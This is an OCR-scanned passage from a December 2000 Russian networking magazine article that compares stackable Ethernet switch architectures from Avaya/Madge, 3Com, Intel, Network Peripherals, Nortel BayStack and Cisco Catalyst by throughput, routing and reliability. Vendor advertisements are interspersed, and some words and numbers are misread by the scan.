торых поддерживаются Fast Ethernet
по витон паре и оптическому волокну,
Gigabit Ethernet (версии SX и LX) и
ATM ОС-3 (155 Мбит/с). Каждый из
коммутаторов семейства полнофунк-
ционален и может работать как от-
дельное устройство (причем весьма
эффективно).
Радикальное отличие устройств
Cajun Рпо от других коммутаторов,
имевшихся в тот момент на рынке, со-
стояло в наличии специальной внеш-
ней шины Exoplane для передачи дан-
ных между устройствами стека (см.
Рисунок 1). Эта шина имела пропуск-
ную способность 4 Гбит/с. (это боль-
ше, чем у многих выпускавшихся в
1996 г. коммутаторов на основе шасси)
и позволяла объединять в стек до че-
тырех коммутаторов Cajun Рио. Сое-
диненные в стек устройства становят-
ся в полном смысле слова единым
коммутатором, с общей таблицей
МАС-адресов на 32 ооо записей, еди-
ным управлением и мониторингом.
Магистральные интерфейсы для со-
единения с корпоративной локальной
сетью достаточно иметь только в од-
ном из устройств, собранных в стек.
До 255 VLAN могут быть определены
как группы портов, расположенных в
любом элементе стека (и в любых дру-
гих стеках, связанных с данным). Ко-
личество и тин портов могут плавно
наращиваться или гибко изменяться
по мере необходимости.
Использование высокоскоростной
шипы Exoplane позволяет решить сра-
зу две задачи. Во-первых, пет необхо-
димости соединять элементы стека че-
рез интерфейсы Ethernet, гак что те-
перь их можно задействовать для под-
ключения дополнительных рабочих
мест и серверов. Во-вторых, пропуск-
ная способность Exoplane достаточна
для обеспечения полностью прозрач-
ного и неблокирующего взаимодейст-
вия любой пары портов вне зависимо-
сти от того, находятся они на одном
элементе стека или нет. Это было под-
тверждено, в частности, тестами из-
вестной сетевой лаборатории Tolly
Group.
Все функциональные возможности
в Cajun Рпо обеспечиваются для всех
портов стека независимо от того, рабо-
тает ли коммутатор автономно или в
составе стека. Интересное решение
применено для передачи данных между
VLAN. Все VLAN изолированы друг от
друга, за исключением Global VLAN (с
номером 255), пакеты которой свобод-
но обмениваются с остальными в пре-
делах всей локальной сети. Поместив
серверы с общими ресурсами в Global
> http://www.lanmag.ru
Декабрь 2000 51
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
Рисунок 2. Объединение коммутаторов в стек по матричной схеме на примере коммутаторов
серии SuperStack II компании ЗСот.
VLAN, администратор может обеспе-
чить доступ пользователей к ним из
любой VLAN без использования марш-
рутизации.
Специально для мониторинга се-
тей на основе коммутаторов, где в си-
лу наличия большого числа сегментов
затруднен мониторинг традиционны-
ми средствами протокола RMON,
компанией Madge был разработан и
реализован расширенный протокол
Switch Monitoring (SMON). Он поз-
воляет легко получить интегральную
характеристику состояния сети и ло-
кализовать источники потенциаль-
ных проблем. Сегодня протокол
SMON поддерживается во всех ком-
мутаторах Avaya Communication.
После одобрения в 1999 г. протокола
SMON в качестве стандарта IETF
(RFC 2613) некоторые элементы этой
технологии начали появляться (пока
что в весьма ограниченном виде) и в
продуктах других производителей, в
том числе ^Com, Nortel, Enterasys,
Cisco.
В Cajun Р110 реализованы и некото-
рые средства для повышения надежно-
сти системы. Так, дополнительный мо-
дуль BUPS содержит четыре блока пи-
тания. Будучи подключены к устройст-
вам в стеке, они автоматически прини-
мают на себя нагрузку при выходе из
строя блоков питания коммутаторов.
Магистральные порты большинства
устройств сдвоенные, с автоматиче-
ским аппаратным (т. е. практически
мгновенным) переключением на ре-
зервный канал при нарушении работы
основного (но без распределения на-
грузки между ними).
Однако часть функций описанного
выше «идеального» стекового комму-
татора в Cajun Рпо отсутствует. В пер-
вую очередь это относится к другим
средствам обеспечения надежности.
Шина Exoplane не допускает изъятия
одного элемента без прерывания рабо-
ты стека. Кроме того, арбитраж доступа
к шине Exoplane осуществляется моду-
лем управления (NMA Agent), разме-
щаемым в верхнем элементе стека. Вы-
ход из строя или отключение этого
верхнего устройства разрушает стек,
таким образом, в стеке имеется «сла-
бое» звено. Кроме того, Cajun Рпо не
реализует функций маршрутизации.
Тем не менее при отсутствии требо-
ваний «горячей» замены в целом Cajun
Рпо можно признать эффективным,
экономичным и вполне конкуренто-
способным решением для обслужива-
ния рабочих групп численностью до
юо пользователей. Во многих случаях
характеристики производительности
позволяют применять эти устройства и
для построения серверных ферм или
магистрали локальной сети.
ПЕРВЫЕ АЛЬТЕРНАТИВЫ
Очевидные преимущества стековых
коммутаторов для построения локаль-
ных сетей среднего и крупного размера
заставили многих ведущих производи-
телей вскоре после выпуска Visage
представить свои решения. Однако ни-
кто из них не владел технологией ис-
полнения внешней системы, сравни-
мой по производительности с Exoplane.
Желая ускорить разработки и сокра-
тить сроки выхода на рынок сходных
продуктов, конкуренты использовали
несколько усовершенствованные вари-
анты уже существовавшей, но не стан-
дартизованной на тот момент техноло-
гии Gigabit Ethernet.
Самый характерный пример —
семейство коммутаторов 3С0П1
SuperStack 11 Switch 1100/3300, сте-
ковая модернизация серии 1000/3000
(см. Рисунок 2). В этом решении ис-
пользуется так называемый матрич-
ный модуль (Matrix Module). Дан-
ный модуль устанавливается в слот
расширения одного из элементов сте-
ка и подключается к каждому элемен-
ту (включая тот, в который он устано-
влен) через специальный порт. Мат-
ричный модуль позволяет объеди-
нить в стек до четырех коммутаторов,
что обеспечивает поддержку при ис-
пользовании модулей расширения до
по коммутируемых портов. Пропуск-
ная способность между каждым ком-
мутатором и матричным модулем со-
ставляет о,8 Гбит/с. Матричный мо-
дуль представляет собой фактически
гигабитный коммутатор, связываю-
щий элементы стека; он транслирует
трафик внутри стека и дополнитель-
ную управляющую информацию. Уп-
равление стеком как единым устрой-
ством и другие функции стека реали-
зуются с помощью микропрограмм-
ного обеспечения. В настоящее время
в семейство входят 6 моделей комму-
таторов, с 12 или 24 портами Ethernet
и Fast Ethernet для меди или 8 порта-
ми Fast Ethernet для оптики. Подк-
лючение к магистрали обеспечивает-
ся сменными модулями Fast Ethernet,
Gigabit Ethernet и ATM; каждый из
них может быть установлен в стан-
дартный слот расширения любого
элемента стека. Это предоставляет
большую гибкость по сравнению с
Cajun Р110.
52 LAN/Журнал сетевых решений
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
Рисунок 3. Организация подключения подчиненного устройства к главному в стеке компании
Network Peripherals.
Матричная модель была использо-
вана также Intel в коммутаторах серии
Express 500Т. Матричный модуль в
них является шестипортовым и, буду-
чи установленным в слот расширения,
связывается с базовым устройством по
внутреннему интерфейсу. Соответст-
венно в стек допускается установка до
семи устройств, т. е. обеспечивается
большая по сравнению с SuperStack II
плотность портов на стек (до 196 пор-
тов UTP Fast Ethernet). Стек может
состоять из четырех моделей коммута-
торов Express 520Т/510Т с 12 и 24 пор-
тами ю/loo Fast Ethernet для витой па-
ры и маршрутизирующих коммутато-
ров Express 550T/550F с восемью пор-
тами Fast Ethernet, с медными или оп-
тическими интерфейсами. В качестве
магистральных сменных интерфейсов
изначально поддерживались только
оптические Fast Ethernet и Gigabit
Ethernet. Позже компанией Fore
Systems, активно использующей в сво-
их продуктах технологию ATM и по-
ставляющей Express 510'Г под торговой
маркой ES-2810, был разработан мо-
дуль для подключения к сетям ATM.
Для поддержки маршрутизации
между VLAN или сетями IP компа-
ния 3С01П в конце 1999 г. выпустила
модуль расширения для коммутато-
ров SuperStack 11. Он устанавливает-
ся в стандартный слот расширения и
обеспечивает маршрутизацию паке-
тов IP с помощью протоколов форми-
рования маршрутов RIP, OSPF,
DVMRP. Производительность этого
модуля сравнительно невелика и со-
ставляет всего 300 тыс. пакетов/с, т.
е. соответствует примерно двум пото-
кам Fast Ethernet. Размещение моду-
ля маршрутизации в слоте расшире-
ния может привести к значительному
усложнению системы даже при реше-
нии простых задач. Например, для со-
здания маршрутизирующего стека с
двумя магистральными каналами
Gigabit Ethernet необходимо собрать
полный стек из четырех устройств, в
то время как некоторые рассмотрен-
ные в этом обзоре решения позволя-
ют обойтись двумя или даже одним.
Направляемый па гигабитный порт
трафик должен в такой конфигура-
ции дважды пересечь матричную сис-
тему, что нельзя считать эффектив-
ным решением.
В стеках коммутаторов Intel Express
500Т функции маршрутизации реали-
зуются за счет добавления в стек одно-
го или нескольких устройств Express
550 с поддержкой, кроме IP, маршрути-
зации протокола IPX. Производитель-
ность одного такого устройства также
невелика - около 400 тыс. пакстов/с,
но в данном случае этот параметр мож-
но увеличить до 2,4 млн пакетов/с, со-
бирая коммутаторы в стек.
К сожалению, решения по матрич-
ной схеме в большинстве случаев обес-
печивают сравнительно низкую произ-
водительность. В тестах независимых
лабораторий (например, упомянутой
Tolly Group, а также Silicon Valley
Networking Lab или Mier
Communications) было неоднократно
показано, что производительность сис-
темы коммутации даже автономного
устройства зСот SuperStack II Switch
3300 составляет всего 1,4 Гбит/с. Этого
явно недостаточно для одновременной
поддержки всех 24 портов Fast
Ethernet. Так, при передаче пакетов
размером 64 байт без потерь пакетов
одновременно способны работать толь-
ко 8 портов из 24. В стековой же конфи-
гурации пропускная способность мат-
ричной системы не превосходит воз-
можностей полнодуплексного соедине-
ния Gigabit Ethernet, т. е. 1,0-1,5 Гбит/с
для пакетов различного размера. Про-
изводительность Intel Express 500Т
еще ниже, поскольку и внутренняя, и
внешняя системы коммутации форми-
руются в виде восьми параллельных
каналов по юо Мбит/с каждый (четыре
из них обеспечивают коммутацию вну-
три устройства, и четыре — связь с мат-
ричным модулем). Заметим, что ре-
зультаты тестов признаны как 3С0ГП,
так и Intel. В связи с низкой произво-
дительностью данные решения могут
быть рекомендованы только для неин-
тенсивно используемых систем.
Большой, скорее, даже слишком
большой производительности удалось
добиться компании Network
Peripherals в своих коммутаторах се-
мейства NuWave (NPI), где также ис-
пользуется матричная схема. Оборудо-
вание этой компании известно в нашей
стране, хотя и не получило широкого
распространения. В последние годы
NPI сосредоточилась в основном на
разработках продуктов для Gigabit
Ethernet. В мае 1999 г. NPI было выпу-
щено на рынок три модели коммутато-
ров с возможностью установки в стек
по матричной схеме.
К группе стековых коммутаторов
относятся Keystone24mg Stack
Master, Capstone24t и Capstone8f.
Первый из них, с пропускной способ-
ностью 64 Гбит/с, составляет ядро
стека. В отличие от ранее рассмотрен-
ных схем, он сам по себе является уз-
лом матрицы. Кроме базовых функ-
ций коммутации 24 портов Fast
Ethernet для витой пары и маршрути-
зации протокола IP со скоростью до
6,5 млн пакстов/с с формированием
54 LAN/Журнал сетевых решений
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
маршрутов по протоколу RIP,
Keystonezzpng поддерживает два ма-
гистральных порта Gigabit Ethernet
на весь стек. Впоследствии компания
NPI планирует реализовать редко
встречающуюся в коммутаторах этого
класса возможность устанавливать мо-
дули для подключения к глобальным
сетям, с интерфейсом E-i (2 Мбит/с),
для последовательного соединения по
РРР или трансляции кадров по frame
relay. Кроме того, Keystone24mg обес-
печивает построение таблиц маршру-
тизации, упрощая коммутацию на тре-
тьем уровне между остальными эле-
ментами стека. При соединении эле-
ментов в стек производительность
маршрутизации всей системы дости-
гает 17 млн пакетов/с.
Число портов в стеке может быть
увеличено за счет добавления уст-
ройств Capstone24t и Capstone8f (соот-
ветственно, 24 медных или 8 оптиче-
ских портов Fast Ethernet). Стек поз-
воляет объединять до четырех элемен-
тов, что в сумме дает возможность ис-
пользовать до 96 портов Fast Ethernet.
Коммутатор Keystone24mg является
главным (master), коммутаторы
Capstone - подчиненными (slave). Со-
единение главного и подчиненного
устройств осуществляется по специ-
альной многоканальной линии связи
Stack Serial Interface, объединяющей
четыре полнодуплексных последова-
тельных канала с пропускной способ-
ностью 2 Гбит/с каждый (см. Рисунок
3). Три из них предназначены для пе-
редачи данных, четвертый для пере-
дачи контрольной и управляющей ин-
формации. Это обеспечивает исключи-
тельно высокую, с большим запасом,
производительность системы межсо-
единений стека.
Следует отметить, что стоимость
описанных устройств столь же высока,
как и их производительность. NuWave
обладает значительным запасом пропу-
скной способности по отношению к не-
обходимой даже теоретически. Во мно-
гих случаях подобная сверхвысокая
пропускная способность, значительная
часть которой никогда не будет исполь-
зована, не может оправдать дополни-
тельных вложений.
Основной и неустранимый недоста-
ток матричной схемы — относительно
низкая надежность, вследствие нали-
чия элементов, отказ которых приво-
дит к неработоспособности всего стека.
«Слабыми» звеньями в ней являются
как собственно матричный модуль, так
и элемент стека, в котором он установ-
лен. Даже в случае архитектуры NPI
NuWave, реализуемые главным уст-
ройством функции столь существен-
ны, что при его отключении весь стек в
целом становится практически нерабо-
тоспособным. Кроме того, в NPI
NuWave отсутствуют дополнительные
блоки питания, которые имеются в си-
стемах Intel Express 500Т и 3С0111
SuperStack II.
В целом, стековые коммутаторы на
базе матричной архитектуры могут
быть использованы для создания се-
тей передачи данных, где заранее из-
вестно, что требования к производи-
SMC О
Надежность. Совместимость.
Низкая стоимость владения.
Бесплатная техническая поддержка.
SMC Tiger
Высокая производительность
Многофункциональность
Управляемость
SMC EZ
Plug-and-Play
Поддержка мониторинга сети
Все необходимые функции
SMC Networks
Россия, 103009, Москва,
Малый Кисловский пер.,д. 3,офис 407
Телефакс: (095) 290 29 96
http://www.smc.ru e-mail: info@smc.ru
Авторизованные реселлеры:
Сплайн
Байт
Атон
Ремекс-В
Артек
Next Step
Версия
Демекс Компьютер
VOGS'S
S-Energy
Форум ИТС
(8142)771389
(3953)41 38 34
(3952) 5105 45
+380432 35 7286
(8482) 32 21 47
•380532 50 13 46
•38044 51083 12
+380 542 27 20 82
(8442) 37 33 76
(0722) 27 13 13
(0732) 2388 59
> http://www.lanmag.ru
Декабрь 2000 55
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
Рисунок 4. Благодаря наличию обратной связи
между верхним и нижним коммутаторами стек
коммутаторов BayStack является устойчивым к
отказу любого элемента.
тельности и надежности никогда не
будут высокими.
РАЗВИТИЕ РЫНКА
Более интересная стековая архитек-
тура была применена компанией Вау
Networks (ныне — подразделение
Nortel Networks), в начале 1998 г. вы-
пустившей семейство коммутаторов
BayStack 450 Switch. Внешняя систе-
ма стека создается интерфейсными
модулями Cascade Module, устанав-
ливаемыми в специальный слот каж-
дого элемента. Все модули связыва-
ются в «цепочку» специальными ка-
белями через интерфейсные разъемы,
а с помощью дополнительного, более
длинного кабеля «цепочка» замыка-
ется в кольцо (см. Рисунок 4). Благо-
даря такой архитектуре надежность
системы резко повысилась. Во-пер-
вых, «закольцованная» каскадная си-
стема устойчива к обрыву или отклю-
чению любого звена стекового соеди-
нения. Во-вторых, все коммутаторы в
стеке хранят динамически меняющу-
юся информацию о конфигурации си-
стемы и могут выступать в качестве
управляющих. В-третьих, любой из
коммутаторов в стеке может быть за-
менен в «горячем» режиме (однако,
во всяком случае в текущей версии
микрокода 3.1, такая операция приво-
дит к перезапуску устройств в стеке и
нарушению работы на период переза-
грузки).
Семейство BayStack 450 сегодня
включает несколько устройств с 12
медными или оптическими портами
Fast Ethernet и 24 медными портами
Fast Ethernet. Полностью совместимая
версия BayStack 410Т имеет 24 порта
Ethernet для витой пары па ю Мбит/с
и может применяться для экономич-
ного подключения рабочих станций, в
то время как серверы подключаются
по более быстрым каналам к установ-
ленным в том же стеке BayStack 450Т.
В один стек могут быть соединены до
восьми устройств BayStack 410Т и
450Т в произвольной комбинации.
Благодаря этому, в одном логическом
устройстве может быть объединено до
224 портов Fast Ethernet для витой па-
ры с учетом модулей расширения или
до 128 оптических каналов Fast
Ethernet для создания магистрально-
го центра коммутации — эти цифры
сопоставимы с возможностями мно-
гих модульных коммутаторов на базе
шасси.
Производительность каскадной схе-
мы стека BayStack относительно неве-
лика: в уже упоминавшихся тестах
Mier она составила не более 1,5 Гбит/с.
Внутренняя шипа BayStack 450 облада-
ет большей производительностью, по
сравнению с }Com SuperStack II
Switch и Intel Express Switch; ее про-
пускная способность составляет поряд-
ка з Гбит/с. Поэтому эффективность
работы стека BayStack в значительной
мере зависит от распределения трафи-
ка в системе. Если его удастся органи-
зовать так, чтобы большая часть дан-
ных передавалась между устройствами,
подключенными к одному элементу
стека, то суммарная пропускная спо-
собность оказывается высокой. В про-
тивном случае опа может резко упасть
до неприемлемых значений.
К сожалению, семейство BayStack
не включает в себя коммутатор третье-
го уровня, поэтому маршрутизация
(потребность в которой в системе с та-
кой высокой плотностью портов весьма
вероятна) должна осуществляться
внешним устройством, например из се-
рии маршрутизирующих коммутато-
ров Nortel Accellar.
Стеки BayStack могут подключать-
ся к оптической магистрали с помощью
модулей расширения с портами Fast
Ethernet или Gigabit Ethernet. В них
поддерживается возможность логиче-
ского объединения любых четырех
портов Fast Ethernet или Gigabit
Ethernet в скоростной и надежный ма-
гистральный канал.
Кроме устойчивой архитектуры сте-
ка в BayStack обеспечена дополнитель-
ная надежность магистральных соеди-
нений путем аппаратного переключе-
ния активных портов на резервные, ко-
торыми оснащены некоторые модули
расширения. Распределения нагрузки
между основными и резервными порта-
ми нет, поэтому в обычном режиме ре-
зервные порты находятся в пассивном
состоянии. Кроме того, в системе пред-
усмотрены резервные блоки питания.
Несмотря на перечисленные ограни-
чения коммутаторы семейства BayStack
являются оригинальным и во многих
случаях эффективным решением.
ОСОБЫЙ ПОДХОД
Компания Cisco, один из ведущих
производителей активного сетевого
оборудования, долгое время не предла-
гала наращиваемые версии коммутато-
ров Catalyst. Основной акцент был
сделан на выпуск модульных коммута-
торов Catalyst 5500 и автономных
Catalyst 1900/2900. Однако под воз-
действием рыночной конъюнктуры
Cisco приступила к разработке реше-
ний, сочетающих высокую плотность
портов с низкой стоимостью. Видимо,
в связи с недостатком времени реше-
ния Cisco отличаются своеобразным
подходом.
Семейство Cisco Catalyst 1900
включает несколько вариантов комму-
таторов с 12 или 24 портами Ethernet
для витой пары, различие между кото-
рыми состоит в типе интерфейсов двух
магистральных подключений Fast
Ethernet (медные или оптические в
разных комбинациях). Catalyst
2900XL представляет собой семейство
коммутаторов Fast Ethernet, в которое
56 LAN/Журнал сетевых решений
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
входят несколько устройств с 12 или 24
медными или 12 оптическими портами.
Некоторые из них оснащены двумя
разъемами для установки модулей рас-
ширения Fast Ethernet, Gigabit
Ethernet или ATM. Наконец, выпу-
щенное в мае 1999 г. семейство комму-
таторов Cisco Catalyst 3500XL вклю-
чает три устройства с 12, 24 и 48 порта-
ми Fast Ethernet для витой пары, каж-
дое из которых имеет два сменных ин-
терфейса Gigabit Ethernet и одно уст-
ройство Catalyst 3508 с восемью порта-
ми Gigabit Ethernet.
Все устройства поставляются с дву-
мя версиями микрокода - стандартной
или расширенной (Enterprise). Среди
дополнительных функций расширен-
ной версии возможность трансляции
информации VLAN по протоколам
Cisco ISL и IEEE 802.1Q, предоставле-
ние приоритета пакетам данных ио
протоколу 8о2.тр и другие.
Объединение автономных комму-
таторов Catalyst в стек может осуще-
ствляться двумя способами в соот-
ветствии с разработанной Cisco тех-
нологией Switch Clustering (см. Ри-
сунок 5). Она позволяет объединить в
логически единое устройство (кла-
стер) до 16 коммутаторов Catalyst в
любой допустимой топологии через
обычные интерфейсные порты
Ethernet, Fast Ethernet или Gigabit
Ethernet. Кроме того, сами соедине-
ния между устройствами также могут
объединяться в один логический ка-
нал с использованием технологии
Cisco Fast EtherChannel или Gigabit
EtherChannel. Объединенные устрой-
ства получают общий IP-адрес для
управления ими по протоколу SNMP
как единым целым. Кроме того, и для
протокола формирования логической
топологии локальной сети 802.id
(Spanning Tree) стек выглядит как
одно устройство.
С технической точки зрения один
из коммутаторов стека назначается
главным (Master или Command
Switch). В этом качестве могут ис-
пользоваться устройства семейств
Catalyst 2900XL и 3500XL. Остальные
коммутаторы являются подчиненны-
ми (Slave), в их число могут входить и
Catalyst 1900. Главный коммутатор
способен автоматически обнаруживать
потенциальных участников кластера
АДМИНИСТРАТИВНОЕ ЗДАНИЕ
Рисунок 5. Технология Switch Clustering компании Cisco позволяет объединять в стек устройства,
находящиеся на разных этажах или даже в разных зданиях.
по собственному протоколу обнаруже-
ния (Cisco Discovery Protocol, CDP).
После добавления обнаруженных ком-
мутаторов в класте]) он распространяет
между ними полученную от станции
администратора управляющую инфор-
мацию и обновления микрокода, а так-
же отслеживает изменения в тополо-
гии соединений. Кластер может насчи-
тывать до 750 портов Fast Ethernet для
ШАГ
В БУДУЩЕЕ
Структурированные кабельные системы
для любых приложений
на основе медных и оптических кабелей.
Оптические кабельные системы
высокой плотности
на основе MT-RJ.
Совместимость с имеющимися
оборудованием и технологиями
сегодня и в будущем.
Проектирование, поставка,
монтаж, гарантия
и сопровождение.
25-летняя
гарантия
МУЛЬТИГИГАБИТНЫЕ
Лицензия Госстроя РФ Г081773 л
Москва, ул. Новоалексеевская, 13
www.lh.ru, e-mail: info@lh.ru
тел.: (095) 286-4105,286-5405,286-6905,286-4927 Ж
LANHOST
витой пары, а входящие в него устрой-
ства могут быть разнесены на расстоя-
ние, ограниченное только физически-
ми возможностями каналов передачи
данных, вплоть до юо км.
Альтернативный вариант, возмож-
ный для Catalyst 3500 и некоторых мо-
делей Catalyst 2900, предполагает со-
единение устройств стека в цепочку
(daisy-chain) только через магист-
IBOCO
AceR
нктсоямвст *
SIEMENS
Сот
> http://www.lanmag.ru
Декабрь 2000 57
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
Рисунок 6. Производительность шины OctaPlane
составляет 8 Гбит/с.
ральные порты Gigabit Ethernet. Этот
способ экономичнее, так как не пред-
полагает использование центрального
высокоскоростного устройства. Пос-
кольку стандартный гигабитный мо-
дуль расширения Catalyst имеет всего
один порт, для создания цепочки уст-
ройств применяется специальный ин-
терфейсный коннектор GigaStack
GBIC, фактически представляющий
собой двухпортовый микроконцентра-
тор Gigabit Ethernet. Интерфейс меж-
ду коммутатором и установленным в
нем коннектором выполняет функцию
пакетного фильтра, пропуская лишь
пакеты, адресованные только подклю-
ченным к данному коммутатору уст-
ройствам. С помощью специальных ка-
белей в такую цепочку .можно соеди-
нить до 9 элементов, что обеспечивает
до 216 портов Fast Ethertnet для витой
пары в одном стеке. Кроме того, стеки
могут быть объединены в кластер как
между собой, так и с автономными уст-
ройствами Catalyst. Это позволяет соз-
давать распределенную систему пере-
дачи данных с крайне высоким числом
портов, но с общим адресом для целей
управления.
Предлагаемые Cisco варианты по-
строения наращиваемых систем имеют
существенные недостатки, многие из
них особенно заметны во втором вари-
анте конфигурации. При использова-
нии GigaStack GBIC подсистема для
связи коммутаторов в стеке обладает
крайне низкой пропускной способно-
стью — всего 1 Гбит/с. Этого явно недо-
статочно для поддержки работы значи-
тельного числа портов. Более того, опи-
сываемая подсистема работает в полу-
дуплексном режиме, в результате чего
ее эффективность еще больше снижа-
ется. Стек коммутаторов Catalyst, объ-
единенных подобным образом, можно в
некотором смысле сравнить с группой
автономных устройств, подключенных
к концентратору Gigabit Ethernet.
Очевидно, что производительность по-
добного решения будет даже ниже, чем
у описанной ранее матричной схемы,
где внешняя подсистема является эк-
вивалентом коммутатора. Возможно,
именно поэтому в упомянутых отчетах
лаборатории Mier Communications ре-
зультаты тестирования данной конфи-
гурации вообще не приводятся.
Анализ технологии Switch
Clustering также выявляет больше не-
достатков, чем преимуществ. Для со-
единения коммутаторов приходится
задействовать рабочие интерфейсы,
что приводит к повышению стоимости
конкретного решения из расчета на
пользовательский порт. Высокая про-
изводительность может быть достиг-
нута только при широком использова-
нии соединений Gigabit Ethernet.
Так, в рекомендуемой Cisco конфигу-
рации несколько коммутаторов
Catalyst 3500 объединяются через
опорный Catalyst 3508 (в конфигура-
ции «звезда»). Использование дорого-
стоящего центрального устройства
значительно увеличивает стоимость
решения и требует непропорциональ-
но больших инвестиций на начальном
этапе создания системы. Это нарушает
основной принцип ее постепенной на-
ращиваемости. Более того, производи-
тельность Catalyst 3508 (7 млн паке-
тов/с) составляет всего 6о% от необ-
ходимой для полноценной работы
имеющихся у него восьми интерфей-
сов Gigabit Ethernet. Таким образом,
в полностью сконфигурированной си-
стеме центральный коммутатор может
стать «узким» местом.
Кроме того, технология Switch
Clustering обладает рядом функцио-
нальных ограничений. На данный мо-
мент в ней не предусматривается пере-
дача статистической информации от
коммутаторов нижнего уровня к глав-
ному. Вследствие этого мониторинг
кластерной системы, в том числе по
протоколу RMON, значительно затруд-
нен. Внутри кластера отображение тра-
фика с произвольного порта на тот, к
которому подключен сетевой анализа-
тор, невозможно, если порты находятся
на разных элементах кластера. Именно
из-за невозможности полноценно конт-
ролировать сетевой трафик создание
кластера окажется неосуществимым,
если устройства находятся на значи-
тельном расстоянии друг от друга.
Вследствие слабой интеграции уст-
ройств в кластере недоступными ока-
зываются и многие другие функции,
традиционные для наращиваемых сис-
тем. Транковые соединения между уз-
лами локальной сети не могут вклю-
чать в себя порты, расположенные на
разных устройствах в кластере. Управ-
ление конфигурацией VLAN также за-
труднено. Встроенные средства визу-
ального представления устройств в си-
стеме управления Cisco Visual Switch
Manager обеспечивают отображение
только главного коммутатора и четы-
рех непосредственно подключенных к
нему. Поэтому предлагаемая Cisco ар-
хитектура является скорее имитацией
стека с помощью обычных интерфейс-
ных соединений, где реализована толь-
ко часть функций — единая адресация
и управление, а также обновление мик-
рокода. При этом сомнительна сама це-
лесообразность логического объедине-
ния устройств, физически находящих-
ся на разных этажах здания или даже в
разных зданиях, удаленных на десятки
километров.
Как это ни странно для продукции
Cisco, в настоящий момент в стеке не
обеспечиваются функции маршрути-
зации. Перечисленные выше устрой-
ства являются коммутаторами второго
уровня. Маршрутизаторы и маршру-
тизирующие коммутаторы Cisco не
поддерживают технологию Switch
Clustering и не могут быть включены
в кластер. Анонсированный в январе
2000 г. маршрутизирующий коммута-
тор Catalyst 2948-L3 базируется на
другой архитектуре и также не может
быть добавлен в кластер. Поэтому
маршрутизация между сетями IP или
VLAN должна выполняться внешним
устройством.
Кроме того, в рассматриваемом се-
мействе отсутствуют необходимые
средства повышения надежности, кро-
ме дополнительных блоков питания.
Для поддержки обратной связи между
устройствами стека приходится ис-
58 LAN/Журнал сетевых решений
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
пользовать дополнительные коннекто-
ры Stacking GBIC, занимающие слоты
расширения (эта проблема должна
быть решена в очередной версии мик-
рокода). В «звездообразной» тополо-
гии центральное устройство является
«слабым» звеном, нарушения в работе
которого способны привести к распаду
всего кластера на элементы.
Если по той или иной причине глав-
ное ус тройство в кластере отключается,
остальные коммутаторы продолжают
нормальную работу при наличии функ-
ционирующих соединений между ни-
ми. Однако управление кластером ста-
новится невозможным. Технология
Switch Clustering позволяет назначать
дополнительные IP-адреса подчинен-
ным устройствам в кластере и переда-
вать им полномочия ведущего вруч-
ную, но этот процесс требует участия
администратора и фактически сводит-
ся к созданию кластера заново.
АЛЬТЕРНАТИВА
Все рассмотренные в этой статье уст-
ройства имеют более или менее серьез-
ные недостатки, не позволяющие счи-
тать их идеальным продуктом для ус-
пешного решения задачи построения
экономичной, плавно наращиваемой
системы коммутации без компромис-
сов на уровне производительности
и/или функциональных возможностей.
Значит ли это, что такого продукта па
сегодняшний день не существует?
Пока что последнее слово в этой
многолетней «дискуссии» принадле-
жит Avaya Communicanion. В августе
1999 г. семейство коммутаторов Cajun
Campus пополнилось повой линейкой
Cajun Р330, которая, на субъективный
взгляд автора, может быть названа ли-
нейкой «идеальных стековых коммута-
торов».
Линия коммутаторов Cajun Р330
включает сегодня устройства с 24
(Cajun Р333Т и P333R) и 48 (Cajun
Р334Т) портами Fast Ethernet для ви-
той пары, а также с 12 оптическими пор-
тами looBaseFX (Cajun P332MF). Ком-
мутатор P333R реализует маршрутиза-
цию пакетов по протоколу IP (форми-
рование маршрутов по протоколам RIP
и OSPF) с пропускной способностью
до 1 млн пакетов/с. У всех устройств
есть разъем расширения для установки
дополнительных модулей, среди кото-
рых привлекает внимание модуль с 16
портами Fast Ethernet для витой нары с
необычно высокой плотностью портов.
Сегодня, кроме того, доступны модули
расширения с двумя оптическими пор-
тами Fast Ethernet, с одним или двумя
портами Gigabit Ethernet, и с интер-
фейсами к сетям ATM. Модуль под-
ключения к сети ATM может работать
на скорости как 155 Мбит/с (ОС-3), так
и 622 Мбит/с (ОС-12) гибкое реше-
ние, редко встречающееся на рынке.
Устройства Cajun Р330 объединяют-
ся в стек с помощью устанавливаемых
в специальный разъем модулей, по уже
знакомой нам схеме каскадного соеди-
нения с обратной связью (аналогично
рассмотренному выше BayStack450). В
один стек может быть объединено до ю
устройств, что обеспечивает, с учетом
модулей расширения, до 640 медных
или 140 оптических портов Fast
Ethernet на стек (!) — такое количество
портов превосходит емкость большин-
ства магистральных коммутаторов на
основе шасси. Все устройства могут нс
поместиться в одной монтажной стой-
ке, поэтому помимо стандартных со-
единительных кабелей длиной 30 см
предусмотрены и кабели большей дли-
ны — 2 м, что позволяет размещать стек
в нескольких монтажных стойках.
Ядро архитектуры Р330 — новая
объединительная шина OctaPlane (см.
ВСЯ МОЗАИКА СЕТЕВЫХ ТЕХНОЛОГИЙ
caBteTRon
_____SYsrems
Q
О)
£
Ш
Q
(/)
го
ф
а:
ф
Е
го
ф
Е
4Xis~
Belden
LI legrand
I KRONE
NKTWOKKS
ЗАО ТЕХНОСЕРВИС-СЕТИ
Тел: 180-9474; 189-0095
http://www.tservice.net.ru
Ресурсы Internet
Результаты упоминаемых в статье тестов
можно посмотреть по адресам:
http://www.tolly.com, Document Reference
number 8282
http://www.tolly.com. Document Reference
number 8286
http://www.svnl.com/l-Cube.pdf
http://www.mier.com/reports/cisco/Cisco350
OFinal.pdf
http://www.mier.com/reports/cisco/Cisco292
4MXLFinal.pdf
http://www.mier.com/reports/lucent/cajunp3
33.PDF
Рисунок 6). Она формируется из двух
полнодуплексных каналов с пропуск-
ной способностью 2 Гбит/с каждый. С
учетом двунаправлен пости соедине-
ний и одновременной работы обоих ка-
налов производительность OctaPlane
